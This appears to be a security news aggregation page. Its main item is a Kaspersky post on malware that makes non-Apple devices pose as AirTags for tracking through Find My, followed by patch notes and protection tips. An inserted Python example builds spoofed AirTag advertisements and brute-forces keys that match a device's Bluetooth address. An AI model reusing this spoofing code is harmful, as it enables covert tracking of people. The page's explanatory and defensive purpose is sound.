PJobRAT Malware Campaign Targeted Taiwanese Users via Fake Chat Apps

An Android malware family previously observed targeting Indian military personnel has been linked to a new campaign likely aimed at users in Taiwan under the guise of chat apps.
“PJobRAT can steal SMS messages, phone contacts, device and app information, documents, and media files from infected Android devices,” Sophos security researcher Pankaj Kohli said in a Thursday analysis.
PJobRAT, first

Source: The Hacker News

Protecting Android, Windows, and Linux devices against being tracked via the Find My network | Kaspersky official blog

AirTags are a popular tracking device used by anyone from forgetful key owners to those with malicious intent, such as jealous spouses and car thieves. Using AirTags for spying is simple: a tag is discreetly placed on the target to allow their movements to be conveniently monitored using Apple Find My. We’ve even added protection from AirTag-based tracking to our products for Android.

But a recent study by security researchers has found that remote tracking doesn’t even require buying an AirTag or ever being physically near the target. If an attacker manages to sneak special malware onto someone’s Windows, Android, or Linux device (a computer, a phone, or anything else), it can use the device’s Bluetooth to send out a signal that nearby Apple devices mistake for an AirTag’s broadcast. For Apple devices, the infected phone or computer effectively becomes an oversized AirTag, trackable via the Find My network, which boasts over a billion Apple phones and tablets.

Anatomy of the attack

The attack exploits two features of the Find My technology.

Firstly, the network uses end-to-end encryption, so participants don’t know whose signals they’re relaying. An AirTag and its owner’s phone share a pair of cryptographic keys. When a lost AirTag broadcasts its “callsigns” via Bluetooth, Find My network “detectors” (that is, any Apple device with Bluetooth and internet access, regardless of who owns it) simply upload their own current location, and therefore the AirTag’s, to Apple’s servers, encrypted with the public key carried in the AirTag’s broadcast.

Then, any device can ask for the encrypted location data from the server. And because it’s encrypted, Apple doesn’t know who the signal belongs to, or which device asked for it. The crucial point here is that one can only decrypt the data and find out both whose AirTag it is and its exact location by having the corresponding private key. Therefore, this data is only useful to the owner of the smartphone paired with this AirTag.

Another feature of Find My is that detectors don’t verify whether the broadcast indeed originated from an Apple device. Any device that supports Bluetooth Low Energy (BLE) can send it.

To exploit these features, the researchers came up with the following method:

  1. They install malware on a computer, phone, or some other device running Android, Windows, or Linux; the malware reads the Bluetooth adapter address and sends it to the attackers’ server.
  2. The server uses powerful video cards to generate a pair of encryption keys that is specific to the device’s Bluetooth address and compatible with Apple’s Find My network. Find My derives the advertising address from the public key, so a key pair has to be found whose public key reproduces the adapter’s fixed address.
  3. The public key is sent back to the infected device, and the malware starts transmitting Bluetooth messages that mimic AirTag signals and carry this key.
  4. Any nearby Apple device connected to the internet receives the Bluetooth message and relays it to the Find My network.
  5. The attackers’ server uses the private key to request the location of the infected device from Find My and decrypt the data.
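To make the key/address coupling in steps 1 to 3 concrete, here is an added example in Python; it is not code from the Kaspersky post or from the researchers. It implements P-224 arithmetic from scratch (standard library only), builds and parses an AirTag-style offline-finding advertisement in the 31-byte layout documented by the OpenHaystack project (Apple manufacturer data, type 0x12, with the advertising address taken from the first six public-key bytes and the two high bits of the first byte carried in the payload), and runs the incremental brute force an attacker’s server must perform so that a public key reproduces a fixed adapter address. The adapter address, the scalar start values and the `match_bytes` parameter that shrinks the search are constructed for illustration; the encryption of location reports by finder devices is not modelled.

```python
# Added example (not from the Kaspersky post or the researchers' paper): a minimal
# model of the Find My offline-finding advertisement and of the key/address coupling
# that forces the GPU key search. Frame layout follows the OpenHaystack documentation.

# NIST P-224 (secp224r1) domain parameters; Find My uses this curve.
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000001
A = P - 3
B = 0xB4050A850C04B3ABF54132565044B0B7D7BFD8BA270B39432355FFB4
GX = 0xB70E0CBD6BB4BF7F321390B94A03C1D356C21122343280D6115C1D21
GY = 0xBD376388B5F723FB4C22DFE6CD4375A05A07476444D5819985007E34
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFF16A2E0B8F03E13DD29455C5C2A3D
G = (GX, GY)


def on_curve(pt):
    """True if pt satisfies y^2 = x^3 + A*x + B mod P (None is the point at infinity)."""
    if pt is None:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def _add(p1, p2):
    """Affine point addition; handles doubling and the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def _mul(k, pt):
    """Double-and-add scalar multiplication."""
    acc = None
    while k:
        if k & 1:
            acc = _add(acc, pt)
        pt = _add(pt, pt)
        k >>= 1
    return acc


def pubkey_bytes(k):
    """Find My advertises only the 28-byte x coordinate of the P-224 public key."""
    x, _ = _mul(k, G)
    return x.to_bytes(28, "big")


def ble_address(pub):
    """Advertising address = first 6 key bytes, top two bits set (static random address)."""
    addr = bytearray(pub[:6])
    addr[0] |= 0xC0
    return bytes(addr)


def build_advertisement(pub, status=0x00):
    """31-byte AirTag-style frame: Apple manufacturer data (0x4C00), type 0x12, length 0x19."""
    frame = bytes([0x1E, 0xFF, 0x4C, 0x00, 0x12, 0x19, status]) + pub[6:28]
    frame += bytes([pub[0] >> 6, 0x00])  # top two key bits travel here; then a 0x00 hint byte
    return frame


def parse_advertisement(frame, sender_addr):
    """What a finder does: rebuild the 28-byte public key from address plus payload."""
    if len(frame) != 31 or frame[:6] != bytes([0x1E, 0xFF, 0x4C, 0x00, 0x12, 0x19]):
        raise ValueError("not an offline-finding advertisement")
    first = (sender_addr[0] & 0x3F) | ((frame[29] & 0x03) << 6)
    return bytes([first]) + sender_addr[1:6] + frame[7:29]


def key_matches_address(pub, adapter_addr, match_bytes=6):
    """The constraint on Android/Windows, where the adapter address cannot be changed:
    the key must reproduce it. The top two bits of byte 0 are carried in the payload,
    so 6 + 5*8 = 46 bits must match for a full-length match."""
    if (pub[0] & 0x3F) != (adapter_addr[0] & 0x3F):
        return False
    return pub[1:match_bytes] == adapter_addr[1:match_bytes]


def search_matching_key(adapter_addr, start_scalar, max_tries, match_bytes=6):
    """Incremental brute force: each candidate is the previous point plus G (one EC
    addition), as a GPU searcher iterates. Returns (private scalar, pubkey) or None.
    match_bytes < 6 is a toy reduction; the real search is about 2^46 additions."""
    pt = _mul(start_scalar, G)
    k = start_scalar
    for _ in range(max_tries):
        pub = pt[0].to_bytes(28, "big")
        if key_matches_address(pub, adapter_addr, match_bytes):
            return k, pub
        pt = _add(pt, G)
        k += 1
    return None


if __name__ == "__main__":
    victim_addr = bytes.fromhex("c01a2b3c4d5e")  # constructed adapter address, not a real device
    k, pub = search_matching_key(victim_addr, 1, 100_000, match_bytes=1)
    frame = build_advertisement(pub)
    print("toy-matched scalar:", k, "frame:", frame.hex())
    print("finder would reconstruct:", parse_advertisement(frame, ble_address(pub)).hex())
```

Because the address carries 46 bits of the key, a full match takes about 2^46 point additions on average; that is the work the post describes offloading to rented video cards, and `match_bytes=1` cuts it to a few dozen additions so the search can be run locally. Once a full match exists, a finder running `parse_advertisement` on the spoofed frame reconstructs exactly the public key whose private half the attacker holds, which is what makes the encrypted location reports readable to them.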

How well does the tracking work?

The more Apple devices nearby and the slower the victim’s movement, the better the accuracy and speed of the location tracking. In typical urban environments like homes or offices, the location is typically pinpointed within six to seven minutes and with an accuracy of around three meters. Even in extreme situations, such as being on an airplane, tracking can still occur because internet access is now widely available on flights. The researchers obtained 17 geolocation points throughout a 90-minute flight, allowing them to reconstruct the aircraft’s flight path quite accurately.

Naturally, the success of the attack hinges on whether the victim can be infected with malware, and the details differ slightly by platform. On Linux, infecting the victim’s device is enough, because its Bluetooth stack exposes the adapter address to the malware. Android and Windows, by contrast, randomize the Bluetooth address, so the attacker needs to infect two nearby Bluetooth devices: one as the tracking target (the one that mimics an AirTag), and another to capture the address the target is actually advertising from.

The malicious application needs Bluetooth access, but this isn’t hard to get. Many common app categories – like media players, file sharing tools, and even payment apps – often have legitimate reasons to request it. It’s likely that a convincing and functional bait application will be created for this type of attack, or even that an existing application will be trojanized. The attack requires neither administrative permissions nor root access.

Importantly, we’re not just talking about phones and computers: the attack is effective across a range of devices – including smart TVs, virtual-reality glasses, and other household appliances – as Android and Linux are common operating systems in many of them.

Another key part of the attack is computing the cryptographic keys on the server. Because this is an expensive operation that requires renting hardware with modern video cards, the cost of generating a key for a single victim is estimated at around $2.2. For this reason we consider mass-tracking scenarios, targeting, say, every visitor to a shopping center, unlikely. Targeted attacks at this price, however, are accessible to virtually anyone, including scammers, nosy co-workers, and spouses.

Apple’s response

The company patched the Find My network vulnerability in December 2024 in iOS 18.2, visionOS 2.2, iPadOS 17.7.3 (for older devices) and 18.2 (for newer ones), watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2, and macOS Sequoia 15.2. Unfortunately, as is often the case with Apple, the details of the updates have not been disclosed. The researchers emphasize that this tracking method will remain technically feasible until all Apple users update to at least the above versions, though fewer devices will be able to report a tracked device’s location. And it’s not impossible that the Apple patch could be defeated by another engineering trick.

How to protect yourself from the attack

  • Turn off Bluetooth when you’re not using it if your device has the option.
  • When installing apps, stick to trusted sources only. Verify that the app has been around for a long time, and has many downloads and a high rating in its latest version.
  • Only grant Bluetooth and location access to apps if you’re certain you need those features.
  • Regularly update your device: both the OS and main apps.
  • Make sure you have comprehensive malware protection enabled on all your devices. We recommend Kaspersky Premium.

Besides this rather unusual tracking method, which has not yet been seen in the wild, there are numerous other ways your location and activities can be tracked.

Source: Kaspersky official blog

ANY.RUN Wins Globee Awards 2025 for Outstanding Threat Detection and Response

The Globee Awards is an annual competition that has celebrated companies in various fields, including technology businesses, since 2003. This year, the winners were announced on March 13, and ANY.RUN is one of them! We earned silver in the Outstanding Threat Detection and Response category.

Thank You! 

It’s a pleasure to share the news with our lovely community and once again express gratitude to everyone who joined us on the adventure to a safer future and better tools for cybersecurity professionals. 

A new milestone on this journey was achieved by our flagship product, ANY.RUN Interactive Sandbox. As part of the awards, it was evaluated by a panel consisting of over 1,500 experts from around the world. Based on their scores and detailed reviews, the Sandbox was recognized as one of the best cybersecurity solutions.  

The Value We Bring  

The advantages of our product that especially benefit businesses include:

  • Real-time analysis and constant updates: we keep our users up to date on emerging threats and let them analyze potentially dangerous files in seconds.
  • Safety of sensitive data: our private mode allows you to upload any information that must stay confidential. No one but you will have access to it. ANY.RUN fully complies with SOC 2 and GDPR.
  • Lowering financial risks: with ANY.RUN’s sandbox, SOC specialists can react to threats fast, thus minimizing harmful consequences or avoiding them altogether. As a result, the company budget won’t suffer. 

We work hard to make ANY.RUN Interactive Sandbox a top-notch solution to your malware analysis needs and are happy to see that our efforts were recognized by the award committee. 

Cybersecurity at Globee Awards 2025  

San Madan, President of the Globee Awards, congratulated us and other winners in our category, noting the importance of fighting cyber threats: 

We are excited to celebrate the remarkable achievements of organizations, cybersecurity professionals, and innovators who are influencing the future of cybersecurity. These winners demonstrate resilience, innovation, and a dedication to safeguarding businesses and individuals from the evolving threats in the cyber landscape.

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.


Source: ANY.RUN’s Cybersecurity Blog

Mozilla Patches Critical Firefox Bug Similar to Chrome’s Recent Zero-Day Vulnerability

Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day.
The security vulnerability, CVE-2025-2857, has been described as a case of an incorrect handle that could lead to a sandbox escape.
“Following the recent Chrome sandbox escape (

Source: The Hacker News

Nine-Year-Old npm Packages Hijacked to Exfiltrate API Keys via Obfuscated Scripts

Cybersecurity researchers have discovered several cryptocurrency packages on the npm registry that have been hijacked to siphon sensitive information such as environment variables from compromised systems.
“Some of these packages have lived on npmjs.com for over 9 years, and provide legitimate functionality to blockchain developers,” Sonatype researcher Ax Sharma said. “However, […] the latest

Source: The Hacker News

Iran’s MOIS-Linked APT34 Spies on Allies Iraq & Yemen

The Islamic Republic is keeping its enemies close and its friends closer, with espionage attacks aimed at nearby neighbors.

Source: darkreading

Fake Snow White Movie Torrent Infects Devices with Malware

Disney’s latest Snow White movie, with a 1.6/10 IMDb rating, isn’t just the biggest flop the company has…

Source: Hackread – Latest Cybersecurity, Tech, AI, Crypto & Hacking News

Even More Venmo Accounts Tied to Trump Officials in Signal Group Chat Left Data Public

WIRED has found four new Venmo accounts that appear to be associated with Trump officials who were in an infamous Signal chat. One made a payment with a note consisting solely of an eggplant emoji.

Source: Security Latest

OpenAI Bumps Up Bug Bounty Reward to $100K in Security Update

The artificial intelligence research company previously had its maximum payout set at $20,000 before raising the reward fivefold.

Source: darkreading

How CISA Cuts Impact Election Security

State and federal security experts weighed in on the impact that budgetary and personnel cuts to CISA will have on election security as a whole.

Source: darkreading